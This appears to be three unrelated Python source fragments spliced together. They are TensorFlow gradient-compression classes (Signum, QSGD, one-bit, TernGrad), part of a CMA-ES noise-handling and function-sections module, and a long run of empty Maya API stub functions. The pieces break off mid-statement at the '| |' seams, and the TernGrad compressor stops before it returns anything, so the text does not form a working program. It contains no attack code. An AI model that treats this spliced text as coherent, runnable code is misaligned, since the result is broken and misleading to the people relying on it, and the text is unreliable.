"""Update the residuals."""
name = tensor.name
tensor_decompressed = cls.decompress(tensor_compressed, ctx, params)
delta = tensor_compensate - tensor_decompressed
memory_update_op = cls.residuals[name].assign(delta)
return [memory_update_op]
@staticmethod
def aggregate(tensors, params):
"""Aggregate a list of tensors."""
lr = params["learning_rate"]
agged_tensor = tf.math.add_n(tensors)
agged_tensor = agged_tensor / lr
return agged_tensor
@staticmethod
def compress(tensor, params):
"""Encoding and compressing the signs """
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
sign_encode = tf.math.greater_equal(tensor_flatten, 0)
mean = tf.math.reduce_mean(tf.abs(tensor_flatten))
ctx = tensor_shape
tensor_compressed = mean, sign_encode
params['tensors_size_are_same'] = True
return tensor_compressed, ctx
@staticmethod
def decompress(tensor_compressed, ctx, params):
"""Decoding the signs to float format """
mean, sign_encode = tensor_compressed
tensor_shape = ctx
sign_decode = tf.cast(sign_encode, dtype=tf.float32) * 2.0 - 1.0
sign_decode = mean * sign_decode
tensor_decompressed = tf.reshape(sign_decode, tensor_shape)
return tensor_decompressed
class SignumCompressor(Compressor):
""""""
momentum = {}
@staticmethod
def aggregate(tensors, params):
"""Aggregate a list of tensors."""
agged_tensor = tf.math.add_n(tensors)
agged_tensor = tf.cast(tf.math.greater_equal(agged_tensor, 0), dtype=tf.float32)
agged_tensor = agged_tensor * 2.0 - 1.0
return agged_tensor
@staticmethod
def compress(tensor, params):
"""Encoding and compressing the signs """
# update tensor by momentum
momentum = params["momentum"]
name = tensor.name
SignumCompressor.momentum[name] = tf.Variable(tf.zeros_like(tensor), trainable=False)
tensor = (1.0 - momentum) * tensor + momentum * SignumCompressor.momentum[name]
temp = SignumCompressor.momentum[name].assign(tensor)
tensor = tensor + temp - temp
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
tensor_compressed = tf.math.greater_equal(tensor_flatten, 0)
ctx = tensor_shape
params['tensors_size_are_same'] = True
return tensor_compressed, ctx
@staticmethod
def decompress(sign_encode, ctx, params):
"""Decoding the signs to float format """
tensor_shape = ctx
sign_decode = tf.cast(sign_encode, dtype=tf.float32) * 2.0 - 1.0
tensor_decompressed = tf.reshape(sign_decode, tensor_shape)
return tensor_decompressed
class QsgdCompressor(Compressor):
""""""
@staticmethod
def compress(tensor, params):
def encode2bool(tensor, quantiles):
tensor = tf.cast(tensor, dtype=tf.int32)
bits = tf.cast(math.log(quantiles, 2) + 1, dtype=tf.int32)
def cond(step, input_tensor, output):
return step < bits
def encode(step, input_tensor, output):
base = tf.constant(2, tf.int32)
temp = tf.floormod(input_tensor, base)
output = output.write(step, temp)
input_tensor = tf.floordiv(input_tensor, base)
return step + 1, input_tensor, output
step = tf.constant(0)
output = tf.TensorArray(dtype=tf.int32, size=0, dynamic_size=True)
_, _, final_output = tf.while_loop(cond, encode, loop_vars=[step, tensor, output])
encode_output = tf.cast(final_output.stack(), dtype=tf.bool)
return encode_output
quantum_num = params["quantum_num"]
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
norm = tf.reshape(tf.norm(tensor_flatten), [-1])
abs_gradient = tf.abs(tensor_flatten)
qnum = tf.cast(quantum_num, dtype=tf.float32)
level_float = qnum / norm * abs_gradient
previous_level = tf.math.floor(level_float)
prob = tf.random.uniform(tf.shape(tensor_flatten))
is_next_level = tf.cast(tf.math.less(prob, (level_float - previous_level)), tf.float32)
new_level = tf.cast(previous_level + is_next_level, tf.float32)
#new_level = tf.cast(previous_level + is_next_level, tf.int32)
#encode_output = encode2bool(new_level, quantum_num)
#sign = tf.reshape(tf.greater_equal(tensor, 0), [1, -1])
#encode_output = tf.concat([sign, encode_output], 0)
sign = tf.sign(tensor_flatten)
tensor_compressed = new_level * sign
tensor_compressed = tf.cast(tensor_compressed, dtype=tf.int8 if quantum_num < 128 else tf.int16)
tensor_compressed = tensor_compressed, norm
ctx = tensor_shape
params['tensors_size_are_same'] = True
return tensor_compressed, ctx
@staticmethod
def decompress(tensor_compressed, ctx, params):
def decode4bool(tensor, quantiles):
tensor = tf.cast(tensor, dtype=tf.int32)
bits = tf.cast(math.log(quantiles, 2) + 1, dtype=tf.int32)
def cond(step, input_tensor, output):
return step < bits
def decode(step, input_tensor, output):
base = tf.constant(2, tf.int32)
temp = input_tensor[step, :]
output = output + temp * tf.math.pow(base, step)
return step + 1, input_tensor, output
output = tf.zeros([tf.shape(tensor)[1]], dtype=tf.int32)
step = tf.constant(0)
_, _, decode_output = tf.while_loop(cond, decode, loop_vars=[step, tensor, output])
return decode_output
quantum_num = params["quantum_num"]
qnum = tf.cast(quantum_num, dtype=tf.float32)
tensor_shape = ctx
tensor_compressed, norm = tensor_compressed
#encode_output = tf.cast(encode_output, dtype=tf.int32)
#sign = encode_output[0, :] * 2 - 1
#input_tensor = encode_output[1:, :]
#decode_output = decode4bool(input_tensor, quantum_num)
#decode_output = sign * decode_output
#decode_output = tf.cast(decode_output, dtype=tf.float32)
decode_output = tf.cast(tensor_compressed, dtype=tf.float32)
tensor_decompressed = norm / qnum * decode_output
tensor_decompressed = tf.reshape(tensor_decompressed, tensor_shape)
return tensor_decompressed
class OnebitCompressor(Compressor):
""""""
@staticmethod
def compress(tensor, params):
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
mask0 = tf.math.less(tensor_flatten, 0)
sum0 = tf.math.reduce_sum(tf.boolean_mask(tensor_flatten, mask0))
num0 = tf.math.reduce_sum(tf.cast(mask0, dtype=tf.float32))
num0 = tf.where(tf.math.greater(num0, 0), num0, 1.0)
mean0 = sum0 / num0
mask1 = tf.math.logical_not(mask0)
sum1 = tf.math.reduce_sum(tf.boolean_mask(tensor_flatten, mask1))
num1 = tf.math.reduce_sum(tf.cast(mask1, dtype=tf.float32))
num1 = tf.where(tf.math.greater(num1, 0), num1, 1.0)
mean1 = sum1 / num1
mean0 = tf.reshape(mean0, [-1])
mean1 = tf.reshape(mean1, [-1])
mean = tf.concat([mean0, mean1], 0)
ctx = tensor_shape
tensor_compressed = mask0, mean
params['tensors_size_are_same'] = True
return tensor_compressed, ctx
@staticmethod
def decompress(tensor_compressed, ctx, params):
tensor_shape = ctx
mask0, mean = tensor_compressed
mean0, mean1 = tf.split(mean, 2)
mask0 = tf.cast(mask0, dtype=tf.float32)
tensor_decompressed = mask0 * mean0 + (1-mask0) * mean1
tensor_decompressed = tf.reshape(tensor_decompressed, tensor_shape)
return tensor_decompressed
class TerngradCompressor(Compressor):
""""""
@staticmethod
def compress(tensor, params):
tensor_shape = tf.shape(tensor)
tensor_flatten = tf.reshape(tensor, [-1])
std = tf.math.square(tensor_flatten - tf.math.reduce_mean(tensor_flatten))
std = tf.math.sqrt(tf.math.reduce_mean(std))
c = 2.5
gradient = tf.clip_by_value(tensor_flatten, -c * std, c * std)
scaler = tf.math.reduce_max(tf.math.abs(gradient))
zeros = tf.zeros(tf.shape(tensor_flatten))
abs_gradient = tf.abs(gradient)
sign_gradient = tf.sign(gradient)
rnd_sample = tf.random_uniform(tf.shape(tensor_flatten), 0, scaler)
where_cond = tf.less(rnd_sample, abs_gradient)
binarized_gradient = tf.where(where_cond, sign_gradient * scaler, zeros)
new_sign = tf.sign(binarized_gradient) # -1, 0, 1
"""
a = tf.add(new_sign, 1) # shift -1,0,1 to 0,1,2 (2'b00,2'b01,2'b10)
a = tf.reshape(a, [-1])
pad_size = 4 - tf.mod(tf.size(a), 4)
pad = tf.range(0.0, pad_size)
a = tf.concat([a, pad], 0)
a_split1, a_split2, a_split3, a_split4 = tf.split(a, 4) # assume the size is dividable by 4
# encode 4 grads into 1 Byte
sum_1 = tf.add(a_split1, a_split2 * 4)
sum_2 = tf.add(a_split3 * 16, a_split4 * 64)
sum_all = tf.add(sum_1, sum_2)
tensor_compressed = tf.cast(sum_all, tf.uint8)
"""
scaler = tf.reshape(scaler, [-1])
ctx = tensor_shape
| |
len(maxevals) > 2:
self.evaluations = np.median(maxevals)
## meta_parameters.noise_aggregate == None
self.f_aggregate = aggregate if not None else {1: np.median, 2: np.mean}[ None ]
self.evaluations_just_done = 0 # actually conducted evals, only for documentation
self.noiseS = 0
def __call__(self, X, fit, func, ask=None, args=()):
"""proceed with noise measurement, set anew attributes ``evaluations``
(proposed number of evaluations to "treat" noise) and ``evaluations_just_done``
and return a factor for increasing sigma.
Parameters
----------
``X``
a list/sequence/vector of solutions
``fit``
the respective list of function values
``func``
the objective function, ``fit[i]`` corresponds to
``func(X[i], *args)``
``ask``
a method to generate a new, slightly disturbed solution. The
argument is (only) mandatory if ``epsilon`` is not zero, see
`__init__`.
``args``
optional additional arguments to ``func``
Details
-------
Calls the methods `reeval`, `update_measure` and ``treat` in
this order. ``self.evaluations`` is adapted within the method
`treat`.
"""
self.evaluations_just_done = 0
if not self.maxevals or self.lam_reeval == 0:
return 1.0
res = self.reeval(X, fit, func, ask, args)
if not len(res):
return 1.0
self.update_measure()
return self.treat()
def treat(self):
"""adapt self.evaluations depending on the current measurement
value and return ``sigma_fac in (1.0, self.alphasigma)``
"""
if self.noiseS > 0:
self.evaluations = min((self.evaluations * self.alphaevals, self.maxevals))
return self.alphasigma
else:
self.evaluations = max((self.evaluations * self.alphaevalsdown, self.minevals))
return 1.0 # / self.alphasigma
def reeval(self, X, fit, func, ask, args=()):
"""store two fitness lists, `fit` and ``fitre`` reevaluating some
solutions in `X`.
``self.evaluations`` evaluations are done for each reevaluated
fitness value.
See `__call__`, where `reeval` is called.
"""
self.fit = list(fit)
self.fitre = list(fit)
self.idx = self.indices(fit)
if not len(self.idx):
return self.idx
evals = int(self.evaluations) if self.f_aggregate else 1
fagg = np.median if self.f_aggregate is None else self.f_aggregate
for i in self.idx:
X_i = X[i]
if self.epsilon:
if self.parallel:
self.fitre[i] = fagg(func(ask(evals, X_i, self.epsilon), *args))
else:
self.fitre[i] = fagg([func(ask(1, X_i, self.epsilon)[0], *args)
for _k in range(evals)])
else:
self.fitre[i] = fagg([func(X_i, *args) for _k in range(evals)])
self.evaluations_just_done = evals * len(self.idx)
return self.fit, self.fitre, self.idx
def update_measure(self):
"""updated noise level measure using two fitness lists ``self.fit`` and
``self.fitre``, return ``self.noiseS, all_individual_measures``.
Assumes that ``self.idx`` contains the indices where the fitness
lists differ.
"""
lam = len(self.fit)
idx = np.argsort(self.fit + self.fitre)
ranks = np.argsort(idx).reshape((2, lam))
rankDelta = ranks[0] - ranks[1] - np.sign(ranks[0] - ranks[1])
# compute rank change limits using both ranks[0] and ranks[1]
r = np.arange(1, 2 * lam) # 2 * lam - 2 elements
limits = [0.5 * (Mh.prctile(np.abs(r - (ranks[0, i] + 1 - (ranks[0, i] > ranks[1, i]))),
self.theta * 50) +
Mh.prctile(np.abs(r - (ranks[1, i] + 1 - (ranks[1, i] > ranks[0, i]))),
self.theta * 50))
for i in self.idx]
# compute measurement
# max: 1 rankchange in 2*lambda is always fine
s = np.abs(rankDelta[self.idx]) - Mh.amax(limits, 1) # lives roughly in 0..2*lambda
self.noiseS += self.cum * (np.mean(s) - self.noiseS)
return self.noiseS, s
def indices(self, fit):
"""return the set of indices to be reevaluated for noise
measurement.
Given the first values are the earliest, this is a useful policy
also with a time changing objective.
"""
## meta_parameters.noise_reeval_multiplier == 1.0
lam_reev = 1.0 * (self.lam_reeval if self.lam_reeval
else 2 + len(fit) / 20)
lam_reev = int(lam_reev) + ((lam_reev % 1) > np.random.rand())
## meta_parameters.noise_choose_reeval == 1
choice = 1
if choice == 1:
# take n_first first and reev - n_first best of the remaining
n_first = lam_reev - lam_reev // 2
sort_idx = np.argsort(np.array(fit, copy=False)[n_first:]) + n_first
return np.array(list(range(0, n_first)) +
list(sort_idx[0:lam_reev - n_first]), copy=False)
elif choice == 2:
idx_sorted = np.argsort(np.array(fit, copy=False))
# take lam_reev equally spaced, starting with best
linsp = np.linspace(0, len(fit) - len(fit) / lam_reev, lam_reev)
return idx_sorted[[int(i) for i in linsp]]
# take the ``lam_reeval`` best from the first ``2 * lam_reeval + 2`` values.
elif choice == 3:
return np.argsort(np.array(fit, copy=False)[:2 * (lam_reev + 1)])[:lam_reev]
else:
raise ValueError('unrecognized choice value %d for noise reev'
% choice)
class Sections(object):
"""plot sections through an objective function.
A first rational thing to do, when facing an (expensive)
application. By default 6 points in each coordinate are evaluated.
This class is still experimental.
Examples
--------
::
import cma, numpy as np
s = cma.Sections(cma.ff.rosen, np.zeros(3)).do(plot=False)
s.do(plot=False) # evaluate the same points again, i.e. check for noise
try:
s.plot()
except:
print('plotting failed: matplotlib.pyplot package missing?')
Details
-------
Data are saved after each function call during `do`. The filename
is attribute ``name`` and by default ``str(func)``, see `__init__`.
A random (orthogonal) basis can be generated with
``cma.Rotation()(np.eye(3))``.
CAVEAT: The default name is unique in the function name, but it
should be unique in all parameters of `__init__` but `plot_cmd`
and `load`. If, for example, a different basis is chosen, either
the name must be changed or the ``.pkl`` file containing the
previous data must first be renamed or deleted.
``s.res`` is a dictionary with an entry for each "coordinate" ``i``
and with an entry ``'x'``, the middle point. Each entry ``i`` is
again a dictionary with keys being different dx values and the
value being a sequence of f-values. For example ``s.res[2][0.1] ==
[0.01, 0.01]``, which is generated using the difference vector ``s
.basis[2]`` like
``s.res[2][dx] += func(s.res['x'] + dx * s.basis[2])``.
:See also: `__init__`
"""
def __init__(self, func, x, args=(), basis=None, name=None,
plot_cmd=None, load=True):
"""
Parameters
----------
``func``
objective function
``x``
point in search space, middle point of the sections
``args``
arguments passed to `func`
``basis``
evaluated points are ``func(x + locations[j] * basis[i])
for i in len(basis) for j in len(locations)``,
see `do()`
``name``
filename where to save the result
``plot_cmd``
command used to plot the data, typically matplotlib pyplots
`plot` or `semilogy`
``load``
load previous data from file ``str(func) + '.pkl'``
"""
if plot_cmd is None:
from matplotlib.pyplot import plot as plot_cmd
self.func = func
self.args = args
self.x = x
self.name = name if name else str(func).replace(' ', '_').replace('>', '').replace('<', '')
self.plot_cmd = plot_cmd # or semilogy
self.basis = np.eye(len(x)) if basis is None else basis
try:
self.load()
if any(self.res['x'] != x):
self.res = {}
self.res['x'] = x # TODO: res['x'] does not look perfect
else:
print(self.name + ' loaded')
except:
self.res = {}
self.res['x'] = x
def do(self, repetitions=1, locations=np.arange(-0.5, 0.6, 0.2), plot=True):
"""generates, plots and saves function values ``func(y)``,
where ``y`` is 'close' to `x` (see `__init__()`). The data are stored in
the ``res`` attribute and the class instance is saved in a file
with (the weired) name ``str(func)``.
Parameters
----------
``repetitions``
for each point, only for noisy functions is >1 useful. For
``repetitions==0`` only already generated data are plotted.
``locations``
coordinated wise deviations from the middle point given in
`__init__`
"""
if not repetitions:
self.plot()
return
res = self.res
for i in range(len(self.basis)): # i-th coordinate
if i not in res:
res[i] = {}
# xx = np.array(self.x)
# TODO: store res[i]['dx'] = self.basis[i] here?
for dx in locations:
xx = self.x + dx * self.basis[i]
xkey = dx # xx[i] if (self.basis == np.eye(len(self.basis))).all() else dx
if xkey not in res[i]:
res[i][xkey] = []
n = repetitions
while n > 0:
n -= 1
res[i][xkey].append(self.func(xx, *self.args))
if plot:
self.plot()
self.save()
return self
def plot(self, plot_cmd=None, tf=lambda y: y):
"""plot the data we have, return ``self``"""
from matplotlib import pyplot
if not plot_cmd:
plot_cmd = self.plot_cmd
colors = 'bgrcmyk'
pyplot.gcf().clear()
res = self.res
flatx, flatf = self.flattened()
minf = np.inf
for i in flatf:
minf = min((minf, min(flatf[i])))
addf = 1e-9 - minf if minf <= 1e-9 else 0
for i in sorted(res.keys()): # we plot not all values here
if isinstance(i, int):
color = colors[i % len(colors)]
arx = sorted(res[i].keys())
plot_cmd(arx, [tf(np.median(res[i][x]) + addf) for x in arx], color + '-')
pyplot.text(arx[-1], tf(np.median(res[i][arx[-1]])), i)
plot_cmd(flatx[i], tf(np.array(flatf[i]) + addf), color + 'o')
pyplot.ylabel('f + ' + str(addf))
pyplot.draw()
pyplot.ion()
pyplot.show()
return self
def flattened(self):
"""return flattened data ``(x, f)`` such that for the sweep
through | |
**kwargs):
pass
def disown_MPxAttributePatternFactory(*args, **kwargs):
pass
def MPxTransform_minRotLimit_get(*args, **kwargs):
pass
def MPxParticleAttributeMapperNode_computeNodeColor_get(*args, **kwargs):
pass
def MPxTransform_scalePivotX_set(*args, **kwargs):
pass
def MPxUITableControl_className(*args, **kwargs):
pass
def MPxHwShaderNode_outColor_set(*args, **kwargs):
pass
def MPxLocatorNode_excludeAsLocator(*args, **kwargs):
pass
def MPxToolCommand__doFinalize(*args, **kwargs):
pass
def MPxImagePlane_colorGain_set(*args, **kwargs):
pass
def MPxLocatorNode_nodeBoundingBoxMin_set(*args, **kwargs):
pass
def MPxRepresentation_setExternalContent(*args, **kwargs):
pass
def MPxTransform_isBounded(*args, **kwargs):
pass
def MPxMotionPathNode_upAxis_set(*args, **kwargs):
pass
def MFnPlugin_registerDevice(*args, **kwargs):
pass
def new_MPxHardwareShader(*args, **kwargs):
pass
def MaterialInputData_diffuse_get(*args, **kwargs):
pass
def MPxFieldNode_mMaxDistance_set(*args, **kwargs):
pass
def MPxModelEditorCommand_swiginit(*args, **kwargs):
pass
def MPxTransform_overrideDisplayType_get(*args, **kwargs):
pass
def MPxTransform_renderLayerId_get(*args, **kwargs):
pass
def MPx3dModelView_setFogColor(*args, **kwargs):
pass
def MPxEmitterNode_mSeed_get(*args, **kwargs):
pass
def MPxImagePlane_colorGainR_get(*args, **kwargs):
pass
def MPxImagePlane_depthBias_set(*args, **kwargs):
pass
def MPx3dModelView_setIncludeInvisible(*args, **kwargs):
pass
def MPxHwShaderNode_outColorG_set(*args, **kwargs):
pass
def MPxMayaAsciiFilter_writePreConnectAttrsBlock(*args, **kwargs):
pass
def MPxTransform_overridePlayback_set(*args, **kwargs):
pass
def MPxObjectSet_groupNodes_set(*args, **kwargs):
pass
def MPxManipContainer_swiginit(*args, **kwargs):
pass
def MFnPlugin_deregisterControlCommand(*args, **kwargs):
pass
def MPxRenderPassImpl_getNumChannels(*args, **kwargs):
pass
def MPxSurfaceShape_geometryIteratorSetup(*args, **kwargs):
pass
def MPxIkSolverNode_swigregister(*args, **kwargs):
pass
def MPxNode_addExternalContentForFileAttr(*args, **kwargs):
pass
def MPxBakeEngine_swigregister(*args, **kwargs):
pass
def MPxNode_attributeAffects(*args, **kwargs):
pass
def MPxFieldNode_mInputData_set(*args, **kwargs):
pass
def MPxFileResolver_resolveURI(*args, **kwargs):
pass
def MPxTransform_rotateAxisY_get(*args, **kwargs):
pass
def delete_MPxManipulatorNode(*args, **kwargs):
pass
def MPxTransform_maxRotYLimitEnable_set(*args, **kwargs):
pass
def delete_MPxPolyTrg(*args, **kwargs):
pass
def MPxLocatorNode_nodeBoundingBoxSizeX_set(*args, **kwargs):
pass
def new_MPxTransformationMatrix(*args, **kwargs):
pass
def MPxManipContainer_connectToDependNode(*args, **kwargs):
pass
def MPxTransform_getMatrixInverse(*args, **kwargs):
pass
def MPxSurfaceShape_nodeBoundingBoxSizeY_get(*args, **kwargs):
pass
def MPxManipulatorNode_yColor(*args, **kwargs):
pass
def MPxMotionPathNode_bankScale_set(*args, **kwargs):
pass
def MPxManipContainer_draw(*args, **kwargs):
pass
def MPxGeometryIterator_hasNormals(*args, **kwargs):
pass
def MPxMotionPathNode_rotateOrder_set(*args, **kwargs):
pass
def MPxImagePlane_imageType_get(*args, **kwargs):
pass
def MPxEmitterNode_mCurrentTime_get(*args, **kwargs):
pass
def MPxImagePlane_displayOnlyIfCurrent_get(*args, **kwargs):
pass
def MPxFluidEmitterNode_mFluidJitter_get(*args, **kwargs):
pass
def delete_MPxCommand(*args, **kwargs):
pass
def MPxCacheFormat_writeInt32(*args, **kwargs):
pass
def MPxLocatorNode_parentMatrix_set(*args, **kwargs):
pass
def MPxFieldNode_mInputVelocities_get(*args, **kwargs):
pass
def MPxCameraSet_order_set(*args, **kwargs):
pass
def MPxTransform_lodVisibility_get(*args, **kwargs):
pass
def MPxTransform_rotateX_get(*args, **kwargs):
pass
def MPxSurfaceShape_center_set(*args, **kwargs):
pass
def MPxFieldNode_mInputPositions_get(*args, **kwargs):
pass
def MPxSurfaceShape_matrix_set(*args, **kwargs):
pass
def MPxLocatorNode_nodeBoundingBoxMax_set(*args, **kwargs):
pass
def MPxObjectSet_isLayer_get(*args, **kwargs):
pass
def MPxContextCommand_appendSyntax(*args, **kwargs):
pass
def MPxAssembly_deleteRepresentation(*args, **kwargs):
pass
def MPxDragAndDropBehavior_swigregister(*args, **kwargs):
pass
def MFnPlugin_deregisterModelEditorCommand(*args, **kwargs):
pass
def MPxTexContext_className(*args, **kwargs):
pass
def MPxFieldNode_mDeltaTime_set(*args, **kwargs):
pass
def MPxGeometryData_iterator(*args, **kwargs):
pass
def MPxFileTranslator_haveReferenceMethod(*args, **kwargs):
pass
def delete_MPxFluidEmitterNode(*args, **kwargs):
pass
def MPxTransform_maxScaleYLimit_set(*args, **kwargs):
pass
def MPxTransform_maxScaleYLimitEnable_set(*args, **kwargs):
pass
def MPxLocatorNode_swiginit(*args, **kwargs):
pass
def MPxTransform_shearTo(*args, **kwargs):
pass
def MPxBlendShape_inputTargetItem_set(*args, **kwargs):
pass
def MExternalContentInfoTable_getEntryByIndex(*args, **kwargs):
pass
def MPx3dModelView_setDisplayHUD(*args, **kwargs):
pass
def delete_MPxSelectionContext(*args, **kwargs):
pass
def MPxSelectionContext_feedbackNumericalInput(*args, **kwargs):
pass
def MPx3dModelView_preMultipleDraw(*args, **kwargs):
pass
def MPxEmitterNode_mRandStateZ_get(*args, **kwargs):
pass
def MPxTexContext_viewToPort(*args, **kwargs):
pass
def MFnPlugin_deregisterData(*args, **kwargs):
pass
def MPxImagePlane_coverageY_set(*args, **kwargs):
pass
def MPxEmitterNode_mOutput_get(*args, **kwargs):
pass
def MPxImagePlane_colorOffsetG_set(*args, **kwargs):
pass
def MPx3dModelView_worldToView(*args, **kwargs):
pass
def MPxComponentShape_match(*args, **kwargs):
pass
def MPxImagePlane_center_get(*args, **kwargs):
pass
def MPxCacheFormat_readHeader(*args, **kwargs):
pass
def MPxMayaAsciiFilter_writesSelectNode(*args, **kwargs):
pass
def MPxEmitterNode_getRate(*args, **kwargs):
pass
def MPxCacheFormat_swigregister(*args, **kwargs):
pass
def MPxFluidEmitterNode_swigregister(*args, **kwargs):
pass
def MPxDeformerNode_type(*args, **kwargs):
pass
def MPxCameraSet_swigregister(*args, **kwargs):
pass
def MPxSurfaceShape_mControlValueY_set(*args, **kwargs):
pass
def MPxTransform_shear_get(*args, **kwargs):
pass
def MPxNode_compute(*args, **kwargs):
pass
def MPxEmitterNode_mRandStateZ_set(*args, **kwargs):
pass
def MPxTransform_minTransYLimitEnable_get(*args, **kwargs):
pass
def MPxTransform_rotatePivotY_set(*args, **kwargs):
pass
def MPxControlCommand__control(*args, **kwargs):
pass
def MPxTransform_shearXY_get(*args, **kwargs):
pass
def MPxAssembly_activateRep(*args, **kwargs):
pass
def new_MPxLocatorNode(*args, **kwargs):
pass
def MPxTransformationMatrix_shear(*args, **kwargs):
pass
def MPxFluidEmitterNode_mFluidColorR_set(*args, **kwargs):
pass
def MPxAssembly_addAddAttrEdit(*args, **kwargs):
pass
def MPxSurfaceShapeUI_surfaceShapeUI(*args, **kwargs):
pass
def MExternalContentInfoTable_getInfoByKey(*args, **kwargs):
pass
def MPxMotionPathNode_orientationMarkerTime_set(*args, **kwargs):
pass
def new_MPxGeometryData(*args, **kwargs):
pass
def MPxManipulatorNode_doMove(*args, **kwargs):
pass
def MPxGeometryIterator_currentPoint(*args, **kwargs):
pass
def MPxTransform_displayHandle_set(*args, **kwargs):
pass
def MPxPolyTweakUVCommand_parseSyntax(*args, **kwargs):
pass
def MPxTransform_nodeBoundingBox_set(*args, **kwargs):
pass
def MPxTransform_isTemplated_get(*args, **kwargs):
pass
def MPxSelectionContext_processNumericalInput(*args, **kwargs):
pass
def MPxHardwareShader_renderSwatchImage(*args, **kwargs):
pass
def MPx3dModelView_numDormantColors(*args, **kwargs):
pass
def MPx3dModelView_setLightingMode(*args, **kwargs):
pass
def MPxImagePlane_alreadyPremult_get(*args, **kwargs):
pass
def MPxSurfaceShape_nodeBoundingBoxMinY_set(*args, **kwargs):
pass
def MPxEmitterNode_hasValidEmission2dTexture(*args, **kwargs):
pass
def MPxMayaAsciiFilter_writesRequirements(*args, **kwargs):
pass
def MPxGeometryFilter_groupId_get(*args, **kwargs):
pass
def MPxTransform_minTransLimitEnable_get(*args, **kwargs):
pass
def MPxTransform_minRotXLimitEnable_get(*args, **kwargs):
pass
def MPxSkinCluster_weightList_get(*args, **kwargs):
pass
def MFnPlugin_registerModelEditorCommand(*args, **kwargs):
pass
def MPxCameraSet_cameraLayer_get(*args, **kwargs):
pass
def disown_MPxSurfaceShape(*args, **kwargs):
pass
def MPxLocatorNode_isTemplated_get(*args, **kwargs):
pass
def MPxEmitterNode_mOwnerVelData_get(*args, **kwargs):
pass
def MPxSurfaceShape_getShapeSelectionMask(*args, **kwargs):
pass
def MPxFieldNode_mMagnitude_get(*args, **kwargs):
pass
def MPxTransform_minRotYLimit_get(*args, **kwargs):
pass
def MFnPlugin_swiginit(*args, **kwargs):
pass
def MPxHardwareShader_outColorG_set(*args, **kwargs):
pass
def MPxTransform_minRotLimitEnable_set(*args, **kwargs):
pass
def MPxLocatorNode_closestPoint(*args, **kwargs):
pass
def MPxRepresentation_swigregister(*args, **kwargs):
pass
def MPxLocatorNode_nodeBoundingBoxMinY_set(*args, **kwargs):
pass
def disown_MPxRepresentation(*args, **kwargs):
pass
def MPxManipContainer_addMPxManipulatorNode(*args, **kwargs):
pass
def MPxTransform_transformationMatrixPtr(*args, **kwargs):
pass
def MPxMotionPathNode_frontTwist_get(*args, **kwargs):
pass
def MPxMotionPathNode_worldUpVector_set(*args, **kwargs):
pass
def disown_MPxManipulatorNode(*args, **kwargs):
pass
def delete_MPxGeometryIterator(*args, **kwargs):
pass
def MPxMotionPathNode_zCoordinate_set(*args, **kwargs):
pass
def MPxImageFile_glLoad(*args, **kwargs):
pass
def MPxTransform_nodeBoundingBoxMinZ_set(*args, **kwargs):
pass
def MPxImagePlane_coverageOrigin_set(*args, **kwargs):
pass
def MPxTransform_rotateQuaternionY_get(*args, **kwargs):
pass
def MPxHardwareShader_render(*args, **kwargs):
pass
def MaterialInputData_specular_set(*args, **kwargs):
pass
def MPxNode_setExistWithoutInConnections(*args, **kwargs):
pass
def MPxBakeEngine_swiginit(*args, **kwargs):
pass
def delete_MPxParticleAttributeMapperNode(*args, **kwargs):
pass
def MPxSurfaceShapeUI_getDrawRequests(*args, **kwargs):
pass
def disown_MPxHwShaderNode(*args, **kwargs):
pass
def MPxTransform_renderLayerColor_get(*args, **kwargs):
pass
def MPx3dModelView_viewSelectedPrefix(*args, **kwargs):
pass
def MPxEmitterNode_mRate_get(*args, **kwargs):
pass
def disown_MPxImagePlane(*args, **kwargs):
pass
def MPx3dModelView_swigregister(*args, **kwargs):
pass
def MPxMayaAsciiFilter_swigregister(*args, **kwargs):
pass
def disown_MPxObjectSet(*args, **kwargs):
pass
def MPxBlendShape_weight_set(*args, **kwargs):
pass
def MPxIkSolverNode_supportJointLimits(*args, **kwargs):
pass
def MPxSurfaceShape_createFullVertexGroup(*args, **kwargs):
pass
def MPxUITableControl_clearSelection(*args, **kwargs):
pass
def MPxSurfaceShape_match(*args, **kwargs):
pass
def MPxHwShaderNode_outMatteOpacityR_set(*args, **kwargs):
pass
def MPxFluidEmitterNode_mFluidDensityEmission_set(*args, **kwargs):
pass
def MPxManipulatorNode_dependentPlugsReset(*args, **kwargs):
pass
def MPxTransform_maxRotZLimitEnable_set(*args, **kwargs):
pass
def MPxEmitterNode_resetRandomState(*args, **kwargs):
pass
def MPxTransformationMatrix_typeId(*args, **kwargs):
pass
def MPxTransform__dirtyRotation(*args, **kwargs):
pass
def MPxRenderPassImpl_frameBufferSemantic(*args, **kwargs):
pass
def MPxMotionPathNode_getVectors(*args, **kwargs):
pass
def MPxImagePlane_useFrameExtension_get(*args, **kwargs):
pass
def MPxTransform_overrideDisplayType_set(*args, **kwargs):
pass
def MPxParticleAttributeMapperNode_computeNodeColor_set(*args, **kwargs):
pass
def disown_MPxPolyTweakUVInteractiveCommand(*args, **kwargs):
pass
def new_MPxComponentShape(*args, **kwargs):
pass
def MPxMaterialInformation_fInstance_get(*args, **kwargs):
pass
def MPxNode_className(*args, **kwargs):
pass
def MPxCacheFormat_readIntArray(*args, **kwargs):
pass
def MPxTransform_boundingBoxCenterZ_get(*args, **kwargs):
pass
def MPxGeometryFilter_groupId_set(*args, **kwargs):
pass
def MPxSkinCluster_weightValue(*args, **kwargs):
pass
def new_MExternalContentInfoTable(*args, **kwargs):
pass
def MPxTransform_applyRotatePivotLocks(*args, **kwargs):
pass
def MPxMaterialInformation_useMaterialAsTexture(*args, **kwargs):
pass
def MPxTransform_rotateQuaternionY_set(*args, **kwargs):
pass
def MPxAssembly_updateRepNamespace(*args, **kwargs):
pass
def MPxManipContainer_plugToManipConversion(*args, **kwargs):
pass
def MPxTransformationMatrix_rotation(*args, **kwargs):
pass
def MPxConstraint_enableRestPosition_get(*args, **kwargs):
pass
def MPxConstraintCommand_worldUpMatrixAttribute(*args, **kwargs):
pass
def MPxHwShaderNode_outGlowColorR_get(*args, **kwargs):
pass
def delete_MPxFileTranslator(*args, **kwargs):
pass
def MPxAssembly_setInstancePtr(*args, **kwargs):
pass
def MPxTransform_minScaleLimitEnable_set(*args, **kwargs):
pass
def MPxSurfaceShape_instObjGroups_get(*args, **kwargs):
pass
def MPxImagePlane_centerZ_set(*args, **kwargs):
pass
def MPxManipContainer_addStateManip(*args, **kwargs):
pass
